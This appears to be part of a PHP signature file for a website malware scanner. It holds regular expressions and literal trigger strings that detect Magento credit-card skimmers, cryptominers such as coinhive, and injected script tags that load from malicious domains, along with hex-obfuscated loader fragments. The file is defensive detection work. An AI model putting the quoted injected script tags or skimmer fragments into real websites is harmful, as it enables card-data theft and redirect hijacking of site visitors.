	'(locationforexpert|waynickbookgroup)' => array(REX_CLEAR_LINEMATCH, 'js.spam-seo.redirect.038', '<script\s*(?:type\s*=\s*.text\/javascript.\s*)?src\s*=.http(?:s)?:\/\/(?:\w+\.)?(waynickbookgroup|locationforexpert)\.(?:\w+\/)+\w+\.js[^>]+>\s*<\/script>'),
	'lib/minero-hidden.min.js' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.015', '<scrip[^=]+=\s*.https?:\/\/\w?minero\w?\.\w+\/lib\/minero-hidden\.min\.js[^>]+>\s*<\/script>\s*<div\s*class=.minero-hidden.\s*style=.display:\s*none[^<]+<\/div>'),
	'src="https://www.onlineclouds.info/v1/api/helper.js' => array(STR_CLEARLINE, 'js.malware.generic.037', '<script type="text/javascript" src="https://www.onlineclouds.info/v1/api/helper.js"></script>'),
	'src="https://braincdn.org/' => array(STR_CLEARLINE, 'js.malware.generic.038', '<script src="https://braincdn.org/src/braincdn.enc.js"></script>'),
	'https://cdn.letmeplayformoney.com/main.js' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.068.02', '<script\s*src=.https?:\/\/(?:\w+\.)letmeplayformoney\.com\/main\.js[^>]+>\s*<\/script>'),
	'drupalupdates.tk' => array(STR_CLEARLINE, 'js.malware.inject_drupalupdates.001', '<script type="text/javascript" src="//drupalupdates.tk/check.js"></script>'),
	'upgraderservices.cf' => array(STR_CLEARLINE, 'js.malware.inject_upgraderservices.001', '<script type="text/javascript" src="//upgraderservices.cf/drupal.js"></script>'),
	'stats.startreceive.tk/' => array(STR_CLEARLINE, 'js.malware.inject_startreceive.001', '<script rc=\'https://stats.startreceive.tk/script.js?t=1\' type=\'text/javascript\'>'),
	'json.stringengines.com/' => array(STR_CLEARLINE, 'js.malware.inject_stringengines.001', '<script src=\'https://json.stringengines.com/pson.js?n=1\' type=\'text/javascript\'></script>'),
	'livestatsnet.services' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_livestatsnet.001', '<script\s*async="async"\s*src=\s*"https?:\/\/livestatsnet\.services\/[^>]+>(?:<\/script>)?'),
	'lastdaysonlines.com/' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_lastdaysonlines.001', '<script\ssrc="https?:\/\/lastdaysonlines\.com[^>]+>\s*<\/script>'),
	'cdnwebsiteforyou.biz' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_cdnwebsiteforyou.001', '<script\ssrc=.https?:\/\/cdnwebsiteforyou\.biz[^>]+>\s*<\/script>'),
	'simpleoneline.online' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_simpleoneline.001', '<script\ssrc=[\'"]https?:\/\/simpleoneline\.online\/[^>]+async>'),
	'<script src="https://coinhive.com/lib/miner' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.027', '<script\ssrc="https:\/\/coinhive\.com\/lib\/miner[^<]+<\/script>\s*<div\sclass=[\'"]coinhive-miner[^>]+>\s*<em>[^<]+<\/em>\s*<\/div>'),
	'somelandingpage.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_somelandingpage.001', '<\s*scrip[^>]+somelandingpage\.com[^<]+<\/script>'),
	'src=\'https://thebiggestfavoritemake.com/' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_thebiggestfavoritemake.001', '<script[^:]+src=.https:..thebiggestfavoritemake.com[^>]+>[\s]*<.script>'),
	'deliverygoodstrategy.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_deliverygoodstrategy.001', '<*scrip[^>]+deliverygoodstrategy\.com[^<]+<\/script>'),
	'&#x64;&#x61;&#x74;&#x61;&colon;&#x74;&#x65;&#x78;&#x74;&sol;&#x6A;&#x61;&#x76;&#x61;&#x73;' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.065', '<script[^>]+&lpar;&#x63;&rpar;&semi;&rcub;[^<]+<\/script>'),
	'var popunder = {expire' => array(STR_CLEAR_MULTIMATCH, 'js.malware.generic.041', '<script>[\s]*var[\s]*popunder[\s]*=[\s]*\{expire:[\s]*[\d]+,url:[\s]*[^\}]+\};[\s]*<\/script>[\s]*<script[\s]*src=.http[^>]+popunder\.js.><\/script>'),
	'setforspecialdomain.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_setforspecialdomain.001', '<script[^>]+\/setforspecialdomain\.com[^>]+>[\s]*<.script>'),
	'balantfromsun.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_balantfromsun.001', '<script[^<]+?balantfromsun.com[^<]+?<.script>'),
	'privacylocationforloc.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_privacylocationforloc.001', '<script[^<]+?privacylocationforloc.com[^<]+?<.script>'),
	'adsformarket.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.001', '<script[^>]+\.adsformarket\.com[^<]+[\s]*<.script>'),
	'gotosecond2.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.002', '<script[^>]+\.gotosecond2\.com[^>]+>[\s]*<.script>'),
	'destinyfernandi.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.003', '<script[^>]+destinyfernandi\.com[^>]+>[\s]*<.script>'),
	'greenlabelfrancisco.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.004', '<script[^>]+greenlabelfrancisco\.com[^>]+>[\s]*<.script>'),
	'collectfasttracks.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.005', '<script[^>]+collectfasttracks\.com[^>]+>[\s]*<.script>'),
	'verybeatifulantony.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.006', '<script[^>]+verybeatifulantony\.com[^>]+>[\s]*<.script>'),
	'r.aba.ooo' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.007', '<script[^>]+r\.aba\.ooo[^<]+>[\s]*<.script>'),
	'resolutiondestin.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.008', '<script[^>]+resolutiondestin.com[^<]+>[\s]*<.script>'),
	'stivenfernando.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.009', '<script[^>]+stivenfernando.com[^<]+>[\s]*<.script>'),
	'trackstatisticsss.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.010', '<script[^>]+trackstatisticsss.com[^<]+>[\s]*<.script>'),
	'digestcolect.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.011', '<script[^>]+digestcolect.com[^<]+>[\s]*<.script>'),
	'developfirstline.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.012', '<script[^>]+developfirstline.com[^<]+>[\s]*<.script>'),
	'dontstopthismusics.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.013', '<script[^>]+dontstopthismusics.com[^<]+>[\s]*<.script>'),
	'src="http://g00.co/BtFVPd"' => array(STR_CLEAR_LINEMATCH, 'html.malware.g00_co.003.002', '<script [^>]+?src=.http:..g00.co\/BtFVPd.><.script>'),
	'lobbydesires.com' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.014', '<script[^>]+lobbydesires.com[^<]+>[\s]*<.script>'),
	'letsmakeparty3' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.015', '<script[^>]+letsmakeparty3[^<]+>[\s]*<.script>'),
	'.Start(remoteip,int.Parse(remoteport),localip,int.Parse(localport));' => array(STR_CLEARFILE, 'asp.hacktool.portforward.001', NULL),
	'developerstatss.ga' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.016', '<script[^>]+developerstatss.ga[^<]+>[\s]*<.script>'),
	'donatelloflowfirstly.ga' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.017', '<script[^>]+donatelloflowfirstly.ga[^<]+>[\s]*<.script>'),
	'lowerbeforwarden.ml' => array(STR_CLEAR_LINEMATCH, 'js.redirect.mass_injection.018', '<script[^>]+lowerbeforwarden.ml[^<]+>[\s]*<.script>'),
),

'document' => array(STR_TRIGGER,
	
	'document[' => array(STR_TRIGGER,

		'document[_0x' => array(STR_TRIGGER,

			'],_0x' => array(STR_TRIGGER,
				
				'[\'atob\']||(_0x' => array(STR_TRIGGER,
					'[\'atob\']=function(_0x' => array(STR_TRIGGER,
						'id\'],\'cookie\':AnalyticsId[' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.050.02', NULL),
						'grelos_v={\'snd\':null,' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.015.03', 'var [\w]+=\[[^;]{300,}\];\(function\([^\n]+grelos_v\[[^\}]+\(\);\}'),
						'\'__bill2\',_0x' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.103', '\(function\(\)\{try\{var _0x[\w]+[\s]*=\[[^\]]{200,}\];[\s]*\(function\([^\n]+window\[_0x[^\]]+\]\(.load[^\}]+\}catch\(.\)[\{\}\(\)]+;?'),
						'CVV\']))document[\'getElement\'+\'ById\'](_0x' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cc_stealer.012', 'var[\s]*_0x[\w]+[\s]*=[\s]*\[.[\w]+[^`]+document\[.getElement.\+.ById.\]\(_0x[\w]+\[.[\w]+.\]\)[\s]*\[.[\w]+.\][\s]*=[\s]*.[\w]*.;[\s]*\}[\s]*\}'),
					),
				),

				'!![];_0x' => array(STR_TRIGGER,
					'[0x0])[0x0];' => array(STR_TRIGGER,
						'(">|\(|\(\)\);|^)[\s]*var _0x[\w]+[\s]*=[\s]*\[_0x[\w]+\[[\d]+\],' => array(REX_TRIGGER, //special sig for leftover by PG
							']];(function(){var _0x' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.06', 'var _0x[\w]+[\s]*=[\s]*\[_0x[\w]+\[[\d]+\],[\s]*_0x[\w]+\[[\d]+\][^;]+[^\{]+\[0x[\w]+\]\][\s]*;[\s]*\(function\(\)[\s]*\{[\s]*var[\s]*_0x[\w]+[\s]*=[\s]*document\[_0x[^\}]+\)\}\(\)\);'),
						),
					),
				),

				'"\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6D\x61\x70","","\x72\x65\x70\x6C\x61\x63\x65","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x72\x6F\x74\x31\x33"' => array(STR_CLEAR_LINEMATCH, 'js.malware.cc_stealer.002', 'var[\s]*_0x[\w]+[\s]*=[\s]*\[".x[^;]{2000}[^;]+"\];[\s]*var[\s]*_0x[\w]+[\s]*=[\s]*\[_0x[\w]+\[[^\n]+setTimeout\(function\(\)[\s]*\{[^\}]+\},[\s]*[\d]+\)[\s\}]+;'),
				'\x2f\x62\x69\x74\x6c\x79\x2e\x63\x6f\x6d' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.018', 'var[\s]*_0x[\w]+=\[.[^|]+\]\)==[\s]*-1\)\{if\(\/\(android\|bb[^_]+\[_0x[\w]+\[[\d]\]\]\(_0x[\w]+\)\|\|[^{]+\)\)\)\{var[\s]*_0x[\w]+[\s]*=[\s]*new[\s]*Date\([\s]*new[\s]*Date\(\)\[_0x[^\}]+\}\}\}\)\(navigator\[_0x[^\}]+\[_0x[\w]+\[[\d]\]\],_0x[\w]+\[[\d]\]\)\}'),
				'\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.019', 'var[\s]*_0[xX][0-9a-fA-F]+[\s]*=[\s]*\[..x[\w]+.[^\{]+\)\{\(function\(_0[^\}]+\}\}\}\)\(navigator\[_0x[^\}]+\[[\d]+\]\)\}'),
				'"\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x3F\x72\x6F\x75\x74\x65\x3D\x63\x68\x65\x63\x6B\x6F\x75\x74\x2F\x63\x68\x65\x63\x6B\x6F\x75\x74",' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.099', 'var _0x[\w]+=\[".x...x...x...x[^;]+\];[\s]*function setCookie[^\n]+\(\)\}\}\);'),
				'\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72","\x69\x6E\x64\x65\x78\x4F\x66' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.005', 'var[\s]*_0[xX][0-9a-fA-F]+[\s]*=[\s]*\[..x[\w]+.[^\{]+\{[\s]*if[\s]*\(document\[_[\w]+\[[\d]+\]\][\s]*===[\s]*[^#]+btoa[\s]*\([\s]*JSON[\s]*\[_[^\{]+XMLHttpRequest\(\);[\s]*_[\w]+\[[^\{]+\]\)\}\}\)\}\}[\s]*window\[_[\w]+\[[\d]+\]\][\s]*\(_[\w]+\[[\d]+\],[\s]*function\(\)\{_[\w]+\(\)\}\)\}\)'),
				'\x42\x72\x6F\x77\x73\x65\x72","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.066', 'var[\s]*_[\w]+[\s]*=[\s]*\[..x[\d]+[^;]+\][\s]*;[\s]*var[\s]*[\w]+[\s]*=[\s]*new[\s]*Object\(\)[\s]*;[\s]*[\w]+\[_0[^\|]+\|\|[\s]*this\[_0[^\|]+var[\s]*cookie[\s]*=[\s]*getCookie\(_0[^\}]+\],function\(\)\{\}\)\}[\s]*;'),
				'remove\',\'Gate\',\'?hash=\',\'decode' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.110', 'var [\w]+[\s]*=[\s]*\[[^;]+CVV[^;]+\];[\s]*\(function\([^\n]+document\[[^\}]+\'\';\}\};?'),
				'\x63\x63\x73\x61\x76\x65\x5F\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x5F\x79\x72' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.014', NULL),
			),

			';var url=String[_0x' => array(STR_TRIGGER,
				'var i=scrpts' => array(STR_TRIGGER,
	
					'\(\)[;\}]+<.script>' => array(REX_TRIGGER,
						'};var scrpts=document[_0x' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.02', '<script[^>]+>var _0x[\w]+[\s]*=[\s]*\[[^;]+;[\s]*[^>]+url=String[^}]+\};(var text[^}]+\};)?var scrpts=document\[_0x[^}]+\}[^\{]+\{[\w]+\(\)[\};]+<.script>'),
					),
		
					'};var scrpts=document[_0x' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041', 'var _0x[\w]+[\s]*=[\s]*\[[^;]+;[\s]*[^>]+url=String[^}]+\};(var text[^}]+\};)?var scrpts=document\[_0x[^}]+\}[^\{]+\{[\w]+\(\)[\};]+'),
				),
			),

			'["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63' => array(STR_TRIGGER,

				'var _0x[\w]+[\s]*=[\s]*\[".x73.x63.x72' => array(REX_TRIGGER,
					'var _0x' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.04', 'var _0x[\w]+[\s]*=[\s]*\[..x73.x63.x72.x69.x70.x74.,[\s]*..x63.x72.x65.x61.x74[^;]+;[\s]*var _0x[\w]+[\s]*=[\s]*\[_0x[\w]+\[[\d]+\],[^}]+[\}\)\(;]+'),
				),

				'["\x73\x63\x72\x69\x70\x74",' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.09', '_0x[\w]+[\s]*=[\s]*\[..x73.x63.x72.x69.x70.x74.,[\s]*..x63.x72.x65.x61.x74[^;]+;[\s]*var _0x[\w]+[\s]*=[\s]*\[_0x[\w]+\[[\d]+\],[^}]+[\}\)\(;]+'),
			),
			
			'{Domain:' => array(STR_TRIGGER,
				'btoa(_0x' => array(STR_TRIGGER,
					';urll' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.105', 'var[\s]*_0x[\w]+=\[[^\}]+\}[^\n]+\{Domain:[^\n]+(setInterval\([\w]+,[\s]*[\d]+\)|function\(\)[\s]*\{[\s]*[\w]+\(\)[\s]*\}[\s]*\))?;?'),
				),
			),

			'}}setInterval(' => array(STR_TRIGGER,
				'\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72' => array(STR_CLEAR_LINEMATCH, 'js.malware.cc_stealer.005', 'var[\s]*[\w]+[\s]*=[\s]*\[..x[^;]{500,}\];[^\n]+\}\}setInterval\([^,]+,[\s]*[\d]+\);?'),
			),

			'"\x62\x6F\x64\x79","\x62\x65\x66\x6F\x72\x65\x65\x6E\x64","\x3C\x73\x63\x72\x69\x70\x74' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.03', '<script[^\2]+src=[\'"]https?:\/\/cdn\.eeduelements\.com[^>]+>\s*<\/script>\s*<script[^>]+>\s*var\s*(\w+)=\[[\'"].x[^\]]+\]\s*;\s*\(function\(\)\s*{\s*var\s*\w+=\s*new\s*\w+\(function\(\)\s*{\s*if\(document\[\1\[\d+\]\]\)\s*{\s*document\[\1\[\d+\]\]\s*\[\1[^{]+{\s*childList:true}\s*\)\s*}\s*\)\s*\(\)\s*<\/script>'),
			';};var elems={};var result={};var final={};var subkeys,ids;function format(_0x' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.100', 'var _0x[\w]+=\[[^;]+\];\(function\(_0x[^\n]+user_agent.\]=navigator[^\}]+;\}'),
			'c3R5bGU+LkNhcmRCcmFuZEljb24tY29udGFpbmVye2hlaWdodDoxMDAlO3Bvc2l0aW9uOm' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.104', 'var [\w]+[\s]*=[\s]*\[[^\]]{500}[^\n]+catch\([\w]+\)\{\}\}'),
		),
		
		'\x' => array(STR_TRIGGER,

			';document[_' => array(STR_TRIGGER,

				'\x77\x72\x69\x74\x65' => array(STR_TRIGGER, 

					'=["\x25\x33\x43\x25\x37\x33' => array(STR_TRIGGER,
						'\x25\x37\x34\x25\x33\x45","\x77\x72\x69\x74\x65"];document[_0x' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.076', 'var _0x[\w]+=\[".x25[^;]+\];document\[_0x[^\(]+\(unescape\(_0x[^\)]+\)+;?'),
					),

					'\x3C\x73\x63\x72\x69\x70\x74' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.039', 'var\s*\w+\s*=\s*\[[\'"].x3C.x73.x63.x72.x69.x70.x74[^,]+,[\'"].x77.x72.x69.x74.x65[\'"][^;]+(;\s*document\[\w+\[\d+\]\]\s*\(\w+\[\d+\]\)){0,}'),
				),

				'aHR0cD' => array(STR_TRIGGER,

					'aG9zdG5hbWU=' => array(STR_TRIGGER,
						'unction(\'return\x20(function()\x20\'+\'{}.constructor(\x22return\x20this\x22)(\x20)\'+\');' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.072', 'var _0x[\w]+=\[([^,\];]+,){20,}[^;]+;\(function\(_0x[^}]+shift.\]\(\)\);\}\};[^\$]+\{\}\.constructor\(.x22return.x20this[^#]+\}\}\);\}\}\(\)\);'),
					),

					'(i*maxlen,maxlen);enc=crypt[_0x' => array(STR_CLEAR_LINEMATCH, 'js.malware.cc_stealer.006', 'var[\s]*_0[\w]+[\s]*=[\s]*\[(.[\w]+(==|=)?.,?)+\];[\s]*\(function\(_0x[^\}]+\(\)\);\}\};[\s]*_0x[\w]+\(\+\+_0x[^@]+\(.DOMContentLoaded.,_0x[\w]+\);[\s]*document\[.addEventListener.\][\s]*\(_0x[\w]+\(.[\w]+.\),_0x[\w]+\);[\s]*document\[.addEventListener.\][\s]*\(_0x[\w]+\(.[\w]+.\),_0x[\w]+\);setTimeout\(_0x[\w]+,[\w]+\);'),
				),

				'new RegExp(_$_' => array(STR_TRIGGER,
					']](window[_$_' => array(STR_TRIGGER,
						'],success:function(a)' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cc_stealer.001', 'var _\$_[\w]+[\s]*=[\s]*\(function\([\w]+,[\w]+\)[\s]*\{[\s]*var[\s]*[\w]+=[\s]*[\w]+\.length;[\s]*var[\s]*[\w]+[\s]*=[\s]*\[\];[^\\\\]+var [\w]+[\s]*=[\s]*[\'"]\\\\x[^\}]+\}[\s]*\)[\s]*\([^\n]+\);[^\x02]+return [\w][\s]*\}([\s\}]*,[\s]*[\d]+\)[\s]*)?'),
					),
				),

				'\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65' => array(STR_TRIGGER,
					'\x64\x65\x63\x6F\x64\x65' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.057', 'var[\s]*[\w]+[\s]*=[\s]*\[.[^;]+x66.x72.x6F.x6D.x43.x68.x61.x72.x43.x6F.x64.x65[^\n]+(decodedString\[_0x[^;]+\);|CVV\)\[_0x[^\}]+[\s\}]+)'),
				),

				'\x3F\x6B\x65\x79\x3D"' => array(STR_TRIGGER,
					'"\x3B\x20\x70\x61\x74\x68\x3D","\x69\x6E\x64\x65\x78\x4F\x66","\x73\x75\x62\x73\x74\x72\x69\x6E\x67"' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.106', 'var _0x[\w]+=\[[^\]]+.x79.x3D[^;]+\];[\s]*function[^\}]+\};[\s]*return[^\<]+\(\)\}\};?'),
				),

				'rand;' => array(STR_TRIGGER,
					';urll' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.102', 'var [\w]+[\s]*=[\s]*\["[^"]*[^\]]{1000,}[^\n]+rand;[^\}]+urll[^\n<]+\}\)'),
				),

				'=["\x63\x6F\x6F\x6B\x69\x65","' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.045', 'var\s*(\w+)\s*=\s*\[[\'"].x63.x6F.x6F.x6B.x69.x65[\'"],[\'"].x75.x6E.x64.x65.x66.x69.x6E.x65.x64[\'"][^;]+;\s*j[Qq]uery\[\1\[\d+\]\]\s*=\s*function\([^\!]+\!=\s*\1\[\d+\]\)\s*{[^;]+;[^}]+}\s*;\s*var\s*(\w+)=\1\[[^\!]+\!=\s*\1\[[^\!]+\!=\s*\1\[\d+\][^\+]+\+\s*\1\[\d+\]\s*\+[^;]+;[^}]+}\s*\)}\)}\)\s*\(j[Qq]uery\)'),
				'"\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x63\x6E\x74\x5F\x75\x74\x6D",' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.057.02', 'var\s*_0x\w+\s*=\s*\[[^\]]+.x63.x6F.x6F.x6B.x69.x65.x45.x6E.x61.x62.x6C.x65.x64",".x63.x6E.x74.x5F.x75.x74.x6D",".x31",".x2F",".x68.x72.x65.x66"[^\]]+\]\s*;\s*function\s*\w+[^}]+};[^{]+{\s*var\s*\w+\s*=\s*[^}]+}\s*;\s*[^}]+}\s*[^{]+\s*{\s*[^\@]+\w+\(?\)?}};?'),
			),

			'\x3C\x73\x63\x72","\x69\x70\x74\x20' => array(STR_TRIGGER,
				'x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70' => array(STR_TRIGGER,
					'\x77\x72\x69\x74\x65' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.052', '<script>\s*var\s*(_0x\w+)\s*=\s*\[[\'"].x3C.x73.x63.x72[^\2]+.x20.x73.x72.x63.x3D.x22.x68.x74.x74.x70[^;]+;\s*function\s*(\w+)\(\)\s*\{\s*var\s*_0x\w+\s*=\s*\1\[\d\][^\2]+document\[\1\[\d\]\s*\]\s*\([^\2]+\2\(\)\s*<.script>'),
				),
			),

			']);document[_' => array(STR_TRIGGER,
				'\x3C\x73\x63\x72\x69\x70\x74\x3E\x76\x61\x72\x20\x6D\x69\x6E\x65\x72\x20\x3D\x20\x6E\x65\x77\x20' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.005', 'var _0x[\w]+=\[".x[^;]+.x3C.x73.x63.x72.x69.x70.x74.x3E.x76.x61.x72.x20.x6D.x69.x6E.x65.x72.x20.x3D.x20.x6E.x65.x77.x20[^;]+;[^>]+document\[_0x[^]]+\]\]\(_0x[^)]+\]\)'),
			),

			'document["createElement"]("div")' => array(STR_TRIGGER,
				'["appendChild"](document["createTextNode"]([' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.046', '\(?function\s*(\w+)\(\)\s*{\s*(\w+)\s*=\s*[\'"][^;]+;\s*var\s*(\w+)\s*=\s*[\'"][^;]+;\s*var\s*\w+\s*=\s*document\[.createElement.\]\s*\(.\w+.\)\s*;\s*var\s*\w+\s*=\s*{}\s*;[^\[]+\2\s*=\s*\[\2,[^\]]+\]\s*\[.join.\][^\[]+window\[.\1.\]\s*=\s*\1\s*;\s*[^}]+}.\[.charCode[^}]+}\s*;[^{]+{[^\[]+\[.length.\][^\]]+\]\(document\[.createTextNode.\][^;]+;\s*(\w+)\s*=\s*\4\[.innerHTML.\]\s*;\s*\4\s*=\s*\4\[.replace.\][^;]+;[^}]+}\s*;\s*[^}]+\[.innerHTML.\][^}]+}\s*\)\s*\(\)\s*;'),
			),

			'](document["create"+' => array(STR_TRIGGER,
				'+String.fromCharCode(67)+"odeAt' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.046.02', '\(\s*function\s*(\w+)\(\)\s*{[\s;]+(\w+)\s*=\s*[^;]+;+\s*var\s*(\w+)\s*=[^;]+;+\s*var\s*(\w+)\s*=\s*document\[[\'"][createElement\"\+]+String\.fromCharCode\([^\]]+\]\s*\([^{]+{}[^\.]+\.fromCharCode[^\2]+var\s*(\w+)\s*=\s*[\'"]\w+[\'"]\.constructor[^\2]+\5\[[\'"]{2}\+[\'"][constructor\'"\+]{0,15}String\.fromCharCode\(\d+\)\+[constructor\'"\+]{0,15}\s*\]\s*\((\w+)\)\s*;+\s*\w+\s*=\s*[\'"]\w+[\'"]\s*;+\s*\6\s*=\s*\w+[^;]+;+\s*\w+\s*=\s*[\'"][^;]+;+\s*\4\[[\'"]{2}\+[\'"][innerHTML]+[^\]]+\]\s*=\s*[\'"]\w+[\'"]\s*;+}\s*\)\(\)\s*;'),
			),

			'String.fromCharCode' => array(STR_TRIGGER,
				'try{document;}catch(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.016', '[\w]+[\s]*=[\s]*\([^\{]+String.fromCharCode;[\s]*[\w]+[\s]*=[\s]*window;[\s]*[\w]+[\s]*=[\s]*.[\w]+.;[\s]*try\{document\[[^!]+document;\}catch\([\w]+\)\{[\w]+[\s]*=[\s]*[\d]+;\}[\s]*if\(![\w]+\)[\w]+[\s]*=[\s]*[\w]+\[.eval.\];[^!]+!=[\d]+;[\s]*[\w]+\+=[\d]+\)\{[\w]+=[\w]+;if\(\([\d]+x[\d]+==[\d]+\)\)if\([^\}]+\}[\w]+=[\w]+;[\w]+\([\w]+\)\}'),
			),

			'=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.010', 'var\s*_0x\w+=\[..x3C.x73.x63.x72.x69.x70[^\]]+\];var\s*_0x\w+=\[_0x[^;]+;var\s*_0x[^\(]+\(_0x\w+\[\d\]\);\s*document\[_0x\w+\[\d\]\]\(_0x\w+\[\d\]\)'),
			'\x73\x70\x6C\x61\x73\x68\x5F\x69' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.002', '<script\s*type=[^>]+>var\s*_0x\w+=\s*\[..x73.x70.x6C.x61.x73.x68.x5F.x69[^\]]+\];var\s*\w+=_0x\w+\[\d+];if\(\-[^>]+>\s*\d\)\{return\s*[^>]+>\s*\d+\)\{var\s*_0x[^>]+>\s*\d&&[^\+]+\+[^:]+:isIE,[^<]+<\s*\d+[^<]+<.script>'),
			'\x73\x65\x6C\x65\x63\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x70\x61\x79\x6D\x65\x6E\x74\x5B\x63\x63\x5F\x65\x78\x70\x5F\x79\x65\x61\x72\x5D\x22\x5D' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.025', NULL),
			'(.*?(cc_number|ccnumber|cardno|card|cardNumber' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.036', 'var _\w+=\["[^\]]+\];function (\w+)..\{[^\|:]+\{url:_[^\"]+"\W+cc_number.ccnumber.cardno.card[^,]+,(\w+).;jQuery\(_[^\}]+\1\(\)\}\)\}\}document\[[^\)]+\2\)'),
			'.on("click", "#p_method_ccpayment' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.081', '\$\(document\)\.on\(.click.,\s*.\#\w+.,\s*function\s*\(\)\s*{\s*if\(document\.get[Ee]lement[Bb]y[Ii]d\(.payment_form_ccsave.\)\s*\)[^}]+}\s*\)\s*;[^\2]+var\s*\w+\s*=\s*\[[^\2]+.x63.x68.x65.x63.x6B.x6F.x75.x74.x7C.x6F.x6E.x65.x73.x74.x65.x70[^;]+;\s*if\s*\(\s*\(\s*new\s*RegExp\((\w+)[^{]+{\s*document\[\1\[\d\]\s*\]\s*\(\1\[\d\]\s*\)\s*}'),
